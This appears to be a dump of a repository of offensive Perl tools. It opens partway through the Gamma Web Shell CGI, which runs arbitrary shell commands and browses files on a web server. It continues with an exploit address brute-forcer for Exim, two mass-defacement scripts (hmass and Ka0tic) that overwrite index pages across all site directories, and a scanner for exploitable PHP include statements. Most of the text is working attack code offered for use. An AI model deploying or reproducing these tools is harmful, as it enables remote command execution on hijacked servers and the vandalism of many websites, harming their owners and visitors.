border: 1px solid #000;
border-collapse: collapse;
color: #000;
background: #CCF;
}
.box-header, .box-content, .box-text, .box-error, .box-menu {
border: 1px solid #000;
}
.box-header, .box-header a {
color: #FFF;
background: #000;
}
.box-content {
text-align: center;
}
.box-text {
padding: 3px 10px;
font-size: 90%;
}
.box-menu {
padding: 3px 10px;
}
.box-error {
color: #FFF;
background: #F00;
font-weight: bold;
padding: 3px 25px;
text-align: center;
}
.dialog {
text-align: left;
border-collapse: collapse;
}
.dialog-even {
color: #000;
background: #CCF;
}
.dialog-odd {
color: #000;
background: #AAE;
}
.menu {
font-weight: normal;
}
.menu-selected {
font-weight: bold;
}
.tool {
background: transparent;
color: #000;
border-style: hidden;
border-width: 1px;
text-decoration: none;
}
.tool:hover {
border-style: outset;
text-decoration: none;
}
.output {
color: #FFF;
background: #000;
padding: 1em;
font-weight: bold;
}
.output-text {
}
.output-command {
color: #FF7;
background: #000;
}
.output-error {
color: #FFF;
background: #F00;
}
.entries {
border: 1px solid #777;
border-collapse: collapse;
}
.entries td, .entries th {
padding: 2px 10px;
}
.entries th, .entries td {
border: 1px solid #777;
}
.entries-even {
color: #FFF;
background: #444;
}
.entry-dir a {
color: #BBF;
background: transparent;
}
.entry-exec {
color: #BFB;
background: transparent;
}
.entry-file {
}
.entry-mine {
}
.entry-alien {
color: #FBB;
background: transparent;
}
EOT
$LOGIN_TEMPLATE = <<EOT;
<html>
<head>
<title>Gamma Web Shell</title>
<style type="text/css">$STYLESHEET</style>
</head>
<body>
<table width="100%" height="100%">
<tr><td class="header"><h2>$VERSION</h2></td></tr>
<tr>
<td width="100%" height="100%" align="center" valign="center">
<form action="WebShell.cgi" method="POST">
<table class="box">
<tr><th class="box-header">Login</th></tr>
[% if error %]
<tr><td class="box-error">Invalid password!</td></tr>
[% end %]
<tr>
<td class="box-content">
<table class="dialog" width="100%">
<tr>
<td>Password:</td>
<td><input name="password" type="password"></td>
</tr>
</table>
</td>
</tr>
<tr>
<td class="box-content">
<input class="tool" type="submit" value="OK">
</td>
</tr>
</table>
</form>
</td>
</tr>
<tr><td class="footer"><h5>Copyright &copy; 2003 <a href="http://www.gammacenter.com/">Gamma Group</a></h5></td></tr>
</table>
</body>
</html>
EOT
$INPUT_TEMPLATE = <<EOT;
<html>
<head>
<title>Gamma Web Shell</title>
<style type="text/css">$STYLESHEET</style>
</head>
<body>
<table width="100%" height="100%">
<tr><td class="header"><h2>$VERSION</h2></td></tr>
<tr>
<td width="100%" height="100%" align="center" valign="center">
<iframe name="output" src="WebShell.cgi?action=execute" width="80%" height="80%"></iframe>
<br><br>
<script type="text/javascript">
function submit_execute() {
var entry = document.forms.execute.elements['command'];
if (entry.value.length > 0) {
entry.select();
entry.focus();
document.forms.execute.elements['action'].value = 'execute';
return true;
}
else {
return false;
}
}
function submit_browse() {
document.forms.execute.elements['action'].value = 'browse';
}
</script>
<form name="execute" action="WebShell.cgi" method="POST" target="output">
<input name="action" type="hidden" value="execute">
<table class="box">
<tr>
<td class="box-content">
<table class="dialog" width="100%">
<tr>
<th>Command:</th>
<td><input name="command" type="text" size="50"></td>
<td><input class="tool" type="submit" value="Execute" onClick="return submit_execute()"></td>
<td><input class="tool" type="submit" value="Browse" onClick="return submit_browse()"></td>
</tr>
</table>
</td>
</tr>
</table>
</form>
</td>
</tr>
<tr><td class="footer"><h5>Copyright &copy; 2003 <a href="http://www.gammacenter.com/">Gamma Group</a></h5></td></tr>
</table>
</body>
</html>
EOT
$EXECUTE_TEMPLATE = <<EOT;
<html>
<head>
<title>Gamma Web Shell</title>
<style type="text/css">$STYLESHEET</style>
</head>
<body class="output">
[% if old_line %]
<pre class="output-command">[% old_line as html %]</pre>
[% end %]
[% if output %]
<pre class="output-text">[% output as html %]</pre>
[% end %]
[% if error %]
<pre class="output-error">[% error as html %]</pre>
[% end %]
[% if new_line %]
<pre class="output-command">[% new_line as html %]</pre>
[% end %]
</body>
</html>
EOT
$BROWSE_TEMPLATE = <<EOT;
<html>
<head>
<title>Gamma Web Shell</title>
<style type="text/css">$STYLESHEET</style>
</head>
<body class="output">
[% if error %]
<p class="output-error">[% error as html %]</p>
[% end %]
<table class="entries" width="100%">
<tr class="entries-even" align="left">
<th colspan="6">
[% for entry in directory %]<code class="entry-dir"><a href="WebShell.cgi?action=browse&path=[% entry.path as url %]">[% entry.name as html %]/</a></code>[% end %]
</th>
</tr>
<tr class="entries-odd" align="left">
<th width="100%"><small>Name</small></th>
<th><small>Size</small></th>
<th><small>Time</small></th>
<th><small>Owner</small></th>
<th><small>Group</small></th>
<th><small>Mode</small></th>
</tr>
[% for entry in entries %]
<tr class="entries-[% if loop.entry.even %]even[% else %]odd[% end %]">
<td width="100%">
[% if entry.type_file %]
[% if entry.type_exec %]
<code class="entry-exec">[% entry.name as html %]</code>
[% else %]
<code class="entry-file">[% entry.name as html %]</code>
[% end %]
[% elif entry.type_dir %]
<code class="entry-dir"><a href="WebShell.cgi?action=browse&path=[% entry.name as url %]">[% entry.name as html %]/</a></code>
[% else %]
<code class="entry-other">[% entry.name as html %]</code>
[% end %]
</td>
<td align="right">
[% if entry.type_file %]
<code class="entry-text">[% entry.size as html %]</code></td>
[% else %]
&nbsp;
[% end %]
</td>
<td><code class="entry-text">[% entry.time as nbsp %]</code></td>
<td><code class="entry-[% if entry.all_rights %]mine[% else %]alien[% end %]">[% entry.user as html %]</code></td>
<td><code class="entry-[% if entry.all_rights %]mine[% else %]alien[% end %]">[% entry.group as html %]</code></td>
<td><code class="entry-text">[% entry.mode as html %]</code></td>
</tr>
[% end %]
</table>
</body>
</html>
EOT
###############################################################################
package WebShell::MiniXIT;
sub new {
my ($class) = @_;
return bless {}, $class;
}
sub substitute {
my ($self, $input, %keywords) = @_;
my $statements = $self->parse($input);
my $operation = $self->compile($statements);
my $output = $self->evaluate($operation, \%keywords);
return $output;
}
sub parse {
my ($self, $input) = @_;
my $statements = [];
my $start = 0;
while ($input =~ /(\[%\s*(.*?)\s*%\])/g) {
my $match_end = pos($input);
my $match_start = $match_end - length($1);
if ($start < $match_start) {
my $text = substr($input, $start, $match_start-$start);
push @$statements, { id => 'text', text => $text };
}
push @$statements, $self->parse_command($2);
$start = $match_end;
}
if ($start < length($input)) {
my $text = substr($input, $start);
push @$statements, { id => 'text', text => $text };
}
return $statements;
}
sub parse_command {
my ($self, $command) = @_;
if ($command =~ /^if\s+(\w+(\.\w+)*)$/) {
return { id => 'if', test => $1, };
}
elsif ($command =~ /^elif\s+(\w+(\.\w+)*)$/) {
return { id => 'elif', test => $1 };
}
elsif ($command =~ /^else$/) {
return { id => 'else' };
}
elsif ($command =~ /^for\s+(\w+)\s+in\s+(\w+(\.\w+)*)$/) {
return { id => 'for', name => $1, list => $2 };
}
elsif ($command =~ /^end$/) {
return { id => 'end' };
}
elsif ($command =~ /^(\w+(\.\w+)*)(\s+as\s+(\w+))$/) {
return { id => 'print', variable => $1, format => $4 };
}
else {
die "invalid command: '$command'";
}
}
sub compile {
my ($self, $statements) = @_;
my $operation = $self->compile_sequence($statements);
if (scalar(@$statements)) {
my $statement = shift(@$statements);
my $id = $statements->{id};
die "unexpected statement: '$id'";
}
return $operation;
}
sub compile_sequence {
my ($self, $statements) = @_;
my $operations = [];
while (scalar(@$statements) > 0) {
my $id = $statements->[0]->{id};
if ($id eq 'if') {
push @$operations, $self->compile_condition($statements);
}
elsif ($id eq 'for') {
push @$operations, $self->compile_loop($statements);
}
elsif ($id eq 'print' or $id eq 'text') {
my $statement = shift @$statements;
push @$operations, $statement;
}
else {
last;
}
}
return { id => 'sequence', operations => $operations };
}
sub compile_condition {
my ($self, $statements) = @_;
my $conditions = [];
my $statement = shift @$statements;
my $id = defined $statement ? $statement->{id} : 'none';
while ($id eq 'if' or $id eq 'elif' or $id eq 'else') {
my $test = $id ne 'else' ? $statement->{test} : undef;
my $operation = $self->compile_sequence($statements);
push @$conditions, { test => $test, operation => $operation };
$statement = shift @$statements;
$id = defined $statement ? $statement->{id} : 'none';
}
die "'end' expected, but '$id' found" unless $id eq 'end';
return { id => 'condition', conditions => $conditions };
}
sub compile_loop {
my ($self, $statements) = @_;
my $statement = shift @$statements;
my $name = $statement->{name};
my $list = $statement->{list};
my $operation = $self->compile_sequence($statements);
$statement = shift @$statements;
my $id = defined $statement ? $statement->{id} : 'none';
die "'end' expected, but '$id' found" unless $id eq 'end';
return { id => 'loop',
name => $name, list => $list, operation => $operation };
}
sub evaluate {
my ($self, $operation, $keywords) = @_;
$keywords->{loop} = {};
my $chunks = $self->evaluate_operation($operation, $keywords);
return join('', @$chunks);
}
sub evaluate_operation {
my ($self, $operation, $keywords) = @_;
if ($operation->{id} eq 'condition') {
return $self->evaluate_condition($operation->{conditions}, $keywords);
}
elsif ($operation->{id} eq 'loop') {
return $self->evaluate_loop($operation->{name}, $operation->{list},
$operation->{operation}, $keywords);
}
elsif ($operation->{id} eq 'print') {
return $self->evaluate_print($operation->{variable},
$operation->{format}, $keywords);
}
elsif ($operation->{id} eq 'sequence') {
my $chunks = [];
push @$chunks, @{$self->evaluate_operation($_, $keywords)}
for (@{$operation->{operations}});
return $chunks;
}
elsif ($operation->{id} eq 'text') {
return [$operation->{text}];
}
}
sub evaluate_condition {
my ($self, $conditions, $keywords) = @_;
for my $condition (@$conditions) {
my $test = $condition->{test};
my $value = defined $test ?
$self->evaluate_variable($test, $keywords) : 1;
return $self->evaluate_operation($condition->{operation}, $keywords)
if $value;
}
return [];
}
sub evaluate_loop {
my ($self, $name, $list, $operation, $keywords) = @_;
my $values = $self->evaluate_variable($list, $keywords);
my $length = scalar(@$values);
my $index = 0;
my $chunks = [];
for my $value (@$values) {
$keywords->{$name} = $value;
$keywords->{loop}->{$name} = {
index => $index, number => $index+1,
first => $index == 0, last => $index == $length-1,
odd => $index % 2 == 1, even => $index % 2 == 0,
};
push @$chunks, @{$self->evaluate_operation($operation, $keywords)};
$index++;
}
delete $keywords->{$name};
delete $keywords->{loop}->{$name};
return $chunks;
}
sub evaluate_print {
my ($self, $variable, $format, $keywords) = @_;
my $value = $self->evaluate_variable($variable, $keywords);
if ($format eq 'html') {
for ($value) { s/&/&amp;/g; s/</&lt;/g; s/>/&gt;/g; s/"/&quot;/g; }
}
elsif ($format eq 'nbsp') {
for ($value) {
s/&/&amp;/g; s/</&lt;/g; s/>/&gt;/g; s/"/&quot;/g; s/ /&nbsp;/g;
}
}
elsif ($format eq 'url') {
$value =~ s/(\W)/sprintf('%%%02X', ord($1))/eg;
}
elsif ($format ne '') {
die "unknown format: '$format'";
}
return [$value];
}
sub evaluate_variable {
my ($self, $variable, $keywords) = @_;
my $value = $keywords;
for my $name (split(/\./, $variable)) {
$value = $value->{$name};
}
return $value;
}
###############################################################################
package WebShell::Script;
use CGI;
use CGI::Carp qw(fatalsToBrowser);
use IPC::Open3;
use Cwd;
use POSIX;
sub new {
my ($class) = @_;
my $self = bless { }, $class;
$self->initialize();
return $self;
}
sub query {
my ($self, @names) = @_;
my @values = ();
for my $name (@names) {
my $value = $self->{cgi}->param($name);
for ($value) { s/^\s+//; s/\s+$//; }
push @values, $value;
}
return wantarray ? @values : "@values";
}
sub initialize {
my ($self) = @_;
$self->{cgi} = new CGI;
$self->{cwd} = $self->{cgi}->cookie(-name => 'WebShell-cwd');
$self->{cwd} = cwd unless defined $self->{cwd};
$self->{cwd} = cwd if $WebShell::Configuration::restricted_mode;
$self->{login} = 0;
my $login = $self->{cgi}->cookie(-name => 'WebShell-login');
my $password = $self->query('password');
$self->{login} = 1
if crypt($WebShell::Configuration::password, $login."XX") eq $login;
$self->{login} = 1 if $password eq $WebShell::Configuration::password;
}
sub run {
my ($self) = @_;
return $self->login_action unless $self->{login};
my $action = $self->query('action');
$action = 'default' unless $action =~ /^\w+$/;
$action = $self->can($action . '_action');
$action = $self->can('default_action') unless defined $action;
$self->$action();
}
sub default_action {
my ($self) = @_;
$self->publish('INPUT');
}
sub login_action {
my ($self) = @_;
$self->publish('LOGIN', error => ($self->query('password') ne ''));
}
sub command {
my ($self, $command) = @_;
chdir($self->{cwd});
my $pid = open3(\*WRTH, \*RDH, \*ERRH, "/bin/sh");
print WRTH "$command\n";
close(WRTH);
my $output = do { local $/; <RDH> };
my $error = do { local $/; <ERRH> };
waitpid($pid, 0);
return ($output, $error);
}
sub forbidden_command {
my ($self, $command) = @_;
my $error = "This command is not available in the restricted mode.\n";
$error .= "You may only use the following commands:\n";
for my $ok_command (@$WebShell::Configuration::ok_commands) {
$error .= " $ok_command\n";
}
return ('', $error);
}
sub cd_command {
my ($self, $command) = @_;
my $error;
my $directory = $1 if $command =~ /^cd\s+(\S+)$/;
warn "cwd: '$self->{cwd}'\n";
warn "command: '$command'\n";
warn "directory: '$directory'\n";
if ($directory ne '') {
$error = $! unless chdir($self->{cwd});
$error = $! unless chdir($directory);
}
$self->{cwd} = cwd;
return ('', $error);
}
sub execute_action {
my ($self) = @_;
my $command = $self->query('command');
my $user = getpwuid($>);
my $old_line = "[$user: $self->{cwd}]\$ $command";
my ($output, $error);
if ($command ne "") {
my $allow = not $WebShell::Configuration::restricted_mode;
for my $ok_command (@$WebShell::Configuration::ok_commands) {
$allow = 1 if $command eq $ok_command;
}
if ($allow) {
$command =~ /^(\w+)/;
if (my $method = $self->can("${1}_command")) {
($output, $error) = $self->$method($command);
}
else {
($output, $error) = $self->command($command);
}
}
else {
($output, $error) = $self->forbidden_command($command);
}
}
my $new_line = "[$user: $self->{cwd}]\$ " unless $command eq "";
$self->publish('EXECUTE',
old_line => $old_line, new_line => $new_line,
output => $output, error => $error);
}
sub browse_action {
my ($self) = @_;
my $error = "";
my $path = $self->query('path');
if ($WebShell::Configuration::restricted_mode and $path ne '') {
$error = "You cannot browse directories in the restricted mode.";
$path = "";
}
$error = $! unless chdir($self->{cwd});
if ($path ne '') {
$error = $! unless chdir($path);
}
$self->{cwd} = cwd;
opendir(DIR, '.');
my @dir = readdir(DIR);
closedir(DIR);
my @entries = ();
for my $name (@dir) {
my ($dev, $ino, $mode, $nlink, $uid, $gid, $rdev, $size,
$atime, $mtime, $ctime, $blksize, $blocks) = stat($name);
my $modestr = S_ISDIR($mode) ? 'd' : '-';
$modestr .= ($mode & S_IRUSR) ? 'r' : '-';
$modestr .= ($mode & S_IWUSR) ? 'w' : '-';
$modestr .= ($mode & S_ISUID) ? 's' : ($mode & S_IXUSR) ? 'x' : '-';
$modestr .= ($mode & S_IRGRP) ? 'r' : '-';
$modestr .= ($mode & S_IWGRP) ? 'w' : '-';
$modestr .= ($mode & S_ISGID) ? 's' : ($mode & S_IXGRP) ? 'x' : '-';
$modestr .= ($mode & S_IROTH) ? 'r' : '-';
$modestr .= ($mode & S_IWOTH) ? 'w' : '-';
$modestr .= ($mode & S_IXOTH) ? 'x' : '-';
my $userstr = getpwuid($uid);
my $groupstr = getgrgid($gid);
my $sizestr = ($size < 1024) ? $size :
($size < 1024*1024) ? sprintf("%.1fk", $size/1024) :
sprintf("%.1fM", $size/(1024*1024));
my $timestr = strftime('%H:%M %b %e %Y', localtime($mtime));
push @entries, {
name => $name,
type_file => S_ISREG($mode),
type_dir => S_ISDIR($mode),
type_exec => ($mode & S_IXUSR),
mode => $modestr,
user => $userstr,
group => $groupstr,
order => (S_ISDIR($mode) ? 0 : 1) . $name,
all_rights => (-w $name),
size => $sizestr,
time => $timestr,
};
}
@entries = sort { $a->{order} cmp $b->{order} } @entries;
my @directory = ();
my $path = '';
for my $name (split m|/|, $self->{cwd}) {
$path .= "$name/";
push @directory, {
name => $name,
path => $path,
};
}
@directory = ({ name => '', path => '/'}) unless @directory;
$self->publish('BROWSE', entries => \@entries, directory => \@directory,
error => $error);
}
sub publish {
my ($self, $template, %keywords) = @_;
$template = eval '$WebShell::Templates::' . $template . '_TEMPLATE';
my $xit = new WebShell::MiniXIT;
my $text = $xit->substitute($template, %keywords);
$self->{cgi}->url =~ m{^http://([^/]*)(.*)/[^/]*$};
my $domain = $1;
my $path = $2;
my $cwd_cookie = $self->{cgi}->cookie(
-name => 'WebShell-cwd',
-value => $self->{cwd},
-domain => $domain,
-path => $path,
);
my $login = "";
if ($self->{login}) {
my $salt = join '',
('.', '/', 0..9, 'A'..'Z', 'a'..'z')[rand 64, rand 64];
$login = crypt($WebShell::Configuration::password, $salt);
}
my $login_cookie = $self->{cgi}->cookie(
-name => 'WebShell-login',
-value => $login,
-domain => $domain,
-path => $path,
);
print $self->{cgi}->header(-cookie => [$cwd_cookie, $login_cookie]);
print $text;
}
###############################################################################
package WebShell;
my $script = new WebShell::Script;
$script->run;
###############################################################################
###############################################################################

11
pl/exim.pl Normal file
View File

@@ -0,0 +1,11 @@
#!/usr/bin/perl
$cnt = 0xbffffa10;
while (1) {
$hex = sprintf ("0x%x", $cnt);
$res = system ("./exploit $hex");
printf "$hex : $res\n";
$cnt += 4;
}

125
pl/hmass (priv8 mass defacor).pl Normal file
View File

@@ -0,0 +1,125 @@
#!/usr/bin/perl
#My comments >>
#(C)oded by h4ckinger
#Web: www.hackinger.org
#Windows && Linux mass defacer script (c) h4ckinger
#usage: hmass.pl -i <ownedindex.html> -d <defacepath> -p <rootpath>
#example: hmass.pl -p public_html -i hacked.html -d c:\inetpub\wwwroot\
# [-p Optional ]
#mail: hackingerboy@gmail.com
#Special thanks: Darkc0de,CyberGhost,excellance,redLine
#plz send email when u discoverz a buggy
#end my comments<<
#my used functions
use Getopt::Std;
use FileHandle;
use File::Copy "cp";
#<<end used functions
#checking OS
my $OperatingSystem = $^O;
my $unix = "";
if (index(lc($OperatingSystem),"win")!=-1){
$unix="0"; #windows system
}else{
$unix="1"; #unix system
}
#Our variables
getopts (":p:i:d:", \%args);
$p=$args{p}; #root path
$d=$args{d};#mass deface path
$i=$args{i};#index file
#Our index files
#d0 u need 0ther add it
@indexz=('index.html','index.htm','index.asp','index.cfm','index.php','default.html','default.htm','default.asp','default.cfm','default.php');
#Parametres Checking
if(!defined($d) || !defined($i)){usage();}
if(defined($d) && defined($i) && !defined($p)){checkfile($i);checkdir($d);normaldeface($d);};
if(defined($d) && defined($i) && defined($p)){checkfile($i);checkdir($d);rootpathdeface($d,$p);};
#normal deface function
sub normaldeface{
if($unix){
system("clear");
}
else{system("cls");}
$dir=shift;
@otekidizinler=dizinbul($dir);
foreach $tekdizin(@otekidizinler){
foreach $tekindex(@indexz){
if($unix){
gopyala($i,"$dir//$tekdizin//$rpath//$tekindex");
}
else{gopyala($i,"$dir\\$tekdizin\\$rpath\\$tekindex");}
}
print "Defaced here : $tekdizin\n";
}
}
#rootpath deface function
sub rootpathdeface{
if($unix){
system("clear");
}
else{system("cls");}
($dzn,$rpath)=@_;
@aqdunyanin=dizinbul($dzn);
foreach $tekdizin(@aqdunyanin){
foreach $tekindex(@indexz){
if($unix){
gopyala($i,"$dzn//$tekdizin//$rpath//$tekindex");
}
else{gopyala($i,"$dzn\\$tekdizin\\$rpath\\$tekindex");}
}
print "Defaced here : $tekdizin\\$rpath\n";
}
}
#copy function
sub gopyala{
($file1,$file2)=@_;
$n = FileHandle->new("$file1","r");
cp($n,"$file2");
}
#list dir function
sub dizinbul {
my ($dir) = @_;
opendir(DIR, $dir) || return();
my @files = readdir(DIR);
closedir(DIR);
@files = grep { -d "$dir/$_" } @files; #alt dizinler
my @files = grep { $_ !~ /^(\.){1,2}$/ } @files;# Bir alt dizin ve i<>inde bulunulan dizini ay<61>kla
return(@files);
}
sub checkfile{$file=shift; if(!-e $file){print "\n\"$file\" file doesn't exists,check your index file\n";exit;} }
sub checkdir{$dir=shift; if(!-d $dir){print "\n\"$dir\" path doesn't exists,check your deface path\n";exit;} }
#How i use this script ?
sub usage{
if($unix){
system("clear");
}
else{system("cls");}
print q
[
=========================================================================
h4ckinger Mass ExpLoit3r
(C)oded by h4ckinger
www.hackinger.org
usage: hmass.pl -i <ownedindex.html> -d <defacepath> -p <rootpath>
example: hmass.pl -p public_html -i hacked.html -d c:\inetpub\wwwroot\
-p Optional
=========================================================================
];
exit;
}

171
pl/inc.pl Normal file
View File

@@ -0,0 +1,171 @@
#!/usr/bin/perl -w
unlink("results.html");
print "\n \n#Will check a directory for all includes and unsets \n";
print "#Coded by Ironfist (ironsecurity.nl) \n";
print "#Usage: create a folder in your perlfolder and put the files to be scanned in it, next type the folder name below (eg myfolder) \n";
print "#GIVES ERRORS WHEN CHECKING SUBFOLDERS: IGNORE THEM :) \n\n\n";
print "Directory to read? ";
$input = <stdin>;
chop ($input);
@files = <$input/*>;
foreach $file (@files) {
print "Checking: " .$file . "\n";
open(MYINPUTFILE, "$file");
while(<MYINPUTFILE>)
{
my($line) = $_;
chomp($line);
if(($line =~ m/include_once \$/i) || ($line =~ m/require_once \$/i) || ($line =~ m/include_once\(\$/i) || ($line =~ m/require_once\(\$/i) || ($line =~ m/require \$/i) || ($line =~ m/require\(\$/i) || ($line =~ m/require \$/i) || ($line =~ m/include \$/i) || ($line =~ m/include\(\$/i))
{
open(DAT,">>results.html") || die("Cannot Open File");
print DAT "FOUND: $line in $file
";
close(DAT);
}
}
}
@files2 = <$input/*/*>;
foreach $file (@files2) {
print "Checking: " .$file . "\n";
open(MYINPUTFILE, "$file");
while(<MYINPUTFILE>)
{
my($line) = $_;
chomp($line);
if(($line =~ m/include_once \$/i) || ($line =~ m/require_once \$/i) || ($line =~ m/include_once\(\$/i) || ($line =~ m/require_once\(\$/i) || ($line =~ m/require \$/i) || ($line =~ m/require\(\$/i) || ($line =~ m/require \$/i) || ($line =~ m/include \$/i) || ($line =~ m/include\(\$/i))
{
open(DAT,">>results.html") || die("Cannot Open File");
print DAT "FOUND: $line in $file
";
close(DAT);
}
}
}
@files3 = <$input/*/*/*>;
foreach $file (@files3) {
print "Checking: " .$file . "\n";
open(MYINPUTFILE, "$file");
while(<MYINPUTFILE>)
{
my($line) = $_;
chomp($line);
if(($line =~ m/include_once \$/i) || ($line =~ m/require_once \$/i) || ($line =~ m/include_once\(\$/i) || ($line =~ m/require_once\(\$/i) || ($line =~ m/require \$/i) || ($line =~ m/require\(\$/i) || ($line =~ m/require \$/i) || ($line =~ m/include \$/i) || ($line =~ m/include\(\$/i))
{
open(DAT,">>results.html") || die("Cannot Open File");
print DAT "FOUND: $line in $file
";
close(DAT);
}
}
}
@files4 = <$input/*/*/*/*>;
foreach $file (@files4) {
print "Checking: " .$file . "\n";
open(MYINPUTFILE, "$file");
while(<MYINPUTFILE>)
{
my($line) = $_;
chomp($line);
if(($line =~ m/include_once \$/i) || ($line =~ m/require_once \$/i) || ($line =~ m/include_once\(\$/i) || ($line =~ m/require_once\(\$/i) || ($line =~ m/require \$/i) || ($line =~ m/require\(\$/i) || ($line =~ m/require \$/i) || ($line =~ m/include \$/i) || ($line =~ m/include\(\$/i))
{
open(DAT,">>results.html") || die("Cannot Open File");
print DAT "FOUND: $line in $file
";
close(DAT);
}
}
}
@files5 = <$input/*/*/*/*/*>;
foreach $file (@files5) {
print "Checking: " .$file . "\n";
open(MYINPUTFILE, "$file");
while(<MYINPUTFILE>)
{
my($line) = $_;
chomp($line);
if(($line =~ m/include_once \$/i) || ($line =~ m/require_once \$/i) || ($line =~ m/include_once\(\$/i) || ($line =~ m/require_once\(\$/i) || ($line =~ m/require \$/i) || ($line =~ m/require\(\$/i) || ($line =~ m/require \$/i) || ($line =~ m/include \$/i) || ($line =~ m/include\(\$/i))
{
open(DAT,">>results.html") || die("Cannot Open File");
print DAT "FOUND: $line in $file
";
close(DAT);
}
}
}
@files6 = <$input/*/*/*/*/*/*>;
foreach $file (@files6) {
print "Checking: " .$file . "\n";
open(MYINPUTFILE, "$file");
while(<MYINPUTFILE>)
{
my($line) = $_;
chomp($line);
if(($line =~ m/include_once \$/i) || ($line =~ m/require_once \$/i) || ($line =~ m/include_once\(\$/i) || ($line =~ m/require_once\(\$/i) || ($line =~ m/require \$/i) || ($line =~ m/require\(\$/i) || ($line =~ m/require \$/i) || ($line =~ m/include \$/i) || ($line =~ m/include\(\$/i))
{
open(DAT,">>results.html") || die("Cannot Open File");
print DAT "FOUND: $line in $file
";
close(DAT);
}
}
}
@files7 = <$input/*/*/*/*/*/*/*>;
foreach $file (@files7) {
print "Checking: " .$file . "\n";
open(MYINPUTFILE, "$file");
while(<MYINPUTFILE>)
{
my($line) = $_;
chomp($line);
if(($line =~ m/include_once \$/i) || ($line =~ m/require_once \$/i) || ($line =~ m/include_once\(\$/i) || ($line =~ m/require_once\(\$/i) || ($line =~ m/require \$/i) || ($line =~ m/require\(\$/i) || ($line =~ m/require \$/i) || ($line =~ m/include \$/i) || ($line =~ m/include\(\$/i))
{
open(DAT,">>results.html") || die("Cannot Open File");
print DAT "FOUND: $line in $file
";
close(DAT);
}
}
}
print "Done! Check results.html for the found inclusions!";

145
pl/ka0tic.pl Normal file
View File

@@ -0,0 +1,145 @@
#!/usr/local/bin/perl
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-@
# @
# Usage: @
# @
# [sap0@localhost tmp]$ perl ka0s_over -d /home/www/ -f index. -n /tmp/index.html @
# @
# - = [ Ka0tic Lab Tool for Mass Defacement Version 0.3 by S4P0 ] = - @
# Contate nos: @
# @MSN: sap0@linuxmail.org @
# #IRC: irc.GigaChat.org - irc.EFnet.org - Canal #Ka0tic @
# @
# =-=-=-=-=-= @
# Opcoes: @
# -d = Diretorio dos Arquivos, Somente / N?o funciona! @
# -f = Nome do arquivo a ser trocado @
# -n = Diretorio do novo arquivo. @
# Exemplo: @
# perl ka0s_over.pl -d / -f index. -n /tmp/index.html @
# =-=-=-=-=-= @
# @
# [+] Ok, Diretorio dos arquivos: /www/ @
# [+] Ok, O arquivo a ser substituido: index. @
# [+] Ok, Novo arquivo a ser colocado: /tmp/index.html @
# [+] Buscando arquivo[s] @
# [+] Ok, Foram encontrados: 4873 arquivos... @
# [+] Substituindo os arquivos. @
# [+] Arquivos Substituidos com Sucesso! @
# [+] Total de Arquivos substituidos: 4873 @
################################################################################################@
# Detalhes: @
################################################################################################@
# Vers?o 3 do ka0s_over: @
# Retirada fun??es system(); e o comando find que da erro em Sistemas Operacionais, @
# que n?o o Possuem. E colocado um programa em perl que procura e troca. @
# @
# PS: @
# N?o se esque?a de colocar um diret?rio espec?ficado, s? / n?o funciona. Coloquei esse @
# Detalhe at? por que se colocar / ele ir? fazer uma pesquisa muito grande e muito demorada, @
# e poder? causar o travamento do sistema!! ai j? ?ra. @
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-@
################################## ABOUT ###################################################
$VERSION="Version 0.3 by S4P0";
$about =
"\n- = [ Ka0tic Lab Tool for Mass Defacement $VERSION ] = -\n".
"Contate nos:\n".
"\t \@MSN: sap0\@linuxmail.org\n".
"\t \#IRC: irc.GigaChat.org - irc.EFnet.org - Canal \#Ka0tic\n".
"\n=-=-=-=-=-=".
"\nOpcoes:\n".
"\t-d = Diretorio dos arquivos, somente \"\/\" Nao funciona!\n".
"\t-f = Nome do arquivo a ser trocado\n".
"\t-n = Diretorio do novo arquivo.\n".
"Exemplo:\nperl ka0s_over.pl -d /www -f index. -n /tmp/index.html\n".
"=-=-=-=-=-=\n";
############################################################################################
use Getopt::Std;
getopts('d:f:n:', \%args);
if (defined($args{'d'})){$dir=$args{'d'};}else{$dir="/";}
if (defined($args{'f'})){$file=$args{'f'};}else{$dir="";}
if (defined($args{'n'})){$newfile=$args{'n'};}else{$newfile="";}
print $about;
$dirok="[+] Ok, Diretorio dos arquivos: $dir";
$fileok="[+] Ok, O arquivo a ser substituido: $file";
$newfileok="[+] Ok, Novo arquivo a ser colocado: $newfile";
if("$dir") {
print "$dirok\n";
sleep(1);
}
if("$file") {
print "$fileok\n";
sleep(1);
}
else
{
print "";
exit();
}
if("$newfile") {
print "$newfileok\n";
sleep(1);
}
else
{
print "";
exit();
}
printf "[+] Buscando arquivo[s]\n";
my @troca;
find($dir, sub { push(@troca, $_[0]) if ($_[0] =~ /$file/i) });
my $quantidade = scalar(@troca);
if($quantidade<=0) {
print "[-] Erro: Nenhum Arquivo encontrado.\n";sleep(1);
print "[-] Coloque a extencao do arquivo.\n";sleep(1);
print "[-] Ou, Apenas arquivo. [Sem extencao].\n";sleep(1);
exit();
}
printf "[+] Ok, Foram encontrados: $quantidade arquivos...\n";sleep(1);
printf "[+] Substituindo os arquivos.\n";
open(NEW, "< $newfile");
foreach $files(@troca)
{
open(FILE, "> $files");
while (<NEW>) {
print FILE $_;
}
close(FILE);
seek(NEW, 0, 0);
}
close(NEW);
sleep(1);
printf "[+] Arquivos Substituidos com Sucesso!\n";sleep(1);
printf "[+] Total de Arquivos substituidos: $quantidade\n";
sub find {
my ($path, $callback) = @_;
$path = '/' unless $path;
$path =~ s/^\/+/\//;
$path =~ s/\/$//;
my @files = list_dir($path);
my @dirs;
foreach my $file (@files) {
my $filepath = $path.'/'.$file;
&{$callback}($filepath);
push(@dirs, $filepath) if (-d $filepath);
}
undef(@files);
map { find($_, $callback) } @dirs;
return(1);
}
sub list_dir {
my ($dir, $dont_list_subdirs) = @_;
opendir(DIR, $dir) || return();
my @files = readdir(DIR);
closedir(DIR);
@files = grep { !-d "$dir/$_" } @files if ($dont_list_subdirs);
my @files = grep { $_ !~ /^(\.){1,2}$/ } @files;
return(@files);
}

94
pl/lurm_safemod_on.cgi.pl Normal file
View File

@@ -0,0 +1,94 @@
#!/usr/bin/perl
############################################################
## Network security team ##
############################################################
##Coder: Ins ##
############################################################
